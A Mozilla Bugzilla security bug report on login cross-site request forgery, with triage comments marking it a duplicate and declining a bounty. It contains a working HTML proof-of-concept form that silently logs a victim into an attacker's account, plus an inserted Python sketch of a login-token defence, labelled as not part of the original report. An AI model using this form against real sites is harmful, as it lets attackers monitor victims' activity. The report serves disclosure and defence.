Closed Bug 992094 Opened 10 years ago Closed 10 years ago

csrf login in bugzilla

Categories

(bugzilla.mozilla.org :: General, defect)

Production
defect
Not set
normal

RESOLVED DUPLICATE of bug 713926

People

(Reporter: maradrianbelen, Unassigned)

Details

(Whiteboard: [site:bugzilla.mozilla.org][reporter-external])

User Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

Steps to reproduce:

Attacker creates a fake account,
makes a CSRF login like the one below,
then monitors actions performed by the victim or even interacts with him.



poc


<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://bugzilla.mozilla.org/index.cgi" method="POST">
      <input type="hidden" name="Bugzilla&#95;login" value="attacker_email" />
      <input type="hidden" name="Bugzilla&#95;password" value="password" />
      <input type="hidden" name="Bugzilla&#95;remember" value="on" />
      <input type="hidden" name="GoAheadAndLogIn" value="Log&#32;in" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>



Actual results:

Can monitor the victim.

Duped bug 992095, which had this additional comment:
(In reply to mar adrian belen from comment #1)
> https://hackerone.com/reports/547
Group: websites-security → bugzilla-security
Component: Other → General
Product: Websites → bugzilla.mozilla.org
Version: unspecified → Production
Whiteboard: [site:bugzilla.mozilla.org][reporter-external][verif?]
Status: UNCONFIRMED → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE

This is a correct find.

We do have a bug on file to fix this, bug 713926, and it actually looks like there was a patch submitted.

Unfortunately that patch landed in Bugzilla v4.4.3 and up while Mozilla still runs an older Bugzilla 4.2.7.
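
One way a server can reject the forged login POST shown in the PoC, as an added example that is not part of the original report and is not Bugzilla's own patch from bug 713926: a login-form token bound to a pre-login cookie. The `login_cookie` and `login_token` names and the 15-minute lifetime are assumptions.

```python
import hashlib
import hmac
import secrets
import time

SERVER_SECRET = secrets.token_bytes(32)  # per-installation secret (assumption)
TOKEN_LIFETIME = 15 * 60                 # seconds a rendered login form stays valid


def _mac(issued, cookie):
    msg = f"{issued}:{cookie}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def issue_login_token(now=None):
    """On rendering the login form: returns (cookie_value, form_token)."""
    issued = int(time.time() if now is None else now)
    cookie = secrets.token_urlsafe(16)   # set as a pre-login cookie
    return cookie, f"{issued}-{_mac(issued, cookie)}"  # token goes in a hidden field


def check_login_token(cookie, form_token, now=None):
    """On POST, before the submitted credentials are looked at."""
    if not cookie or not form_token:
        return False                     # a bare cross-site form has neither value
    issued_str, _, mac_hex = form_token.partition("-")
    if not (issued_str.isascii() and issued_str.isdigit()):
        return False
    now = time.time() if now is None else now
    if not 0 <= now - int(issued_str) <= TOKEN_LIFETIME:
        return False                     # expired or post-dated token
    expected = _mac(issued_str, cookie)
    # The token only verifies against the cookie it was issued with, so a
    # token the attacker fetched for themselves fails in the victim's browser.
    return hmac.compare_digest(expected.encode(), mac_hex.encode())


def handle_login_post(cookies, form):
    """Returns 'rejected' for a forged login, else 'check-credentials'."""
    if not check_login_token(cookies.get("login_cookie"), form.get("login_token")):
        return "rejected"
    return "check-credentials"
```

The check relies on the attacker being unable to set a cookie in the victim's browser for the site, so it should be paired with cookie scoping that keeps sibling subdomains from writing `login_cookie`.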
Flags: sec-bounty?
Whiteboard: [site:bugzilla.mozilla.org][reporter-external][verif?] → [site:bugzilla.mozilla.org][reporter-external]
Flags: sec-bounty?

Sorry for the confusion by setting the bounty flag on this one. This bug has multiple dupes and those were rejected for bounties earlier:

https://bugzilla.mozilla.org/show_bug.cgi?id=981186
https://bugzilla.mozilla.org/show_bug.cgi?id=966183

So I have removed the sec-bounty flag and the bug will not be triaged for bounty eligibility.
Group: bugzilla-security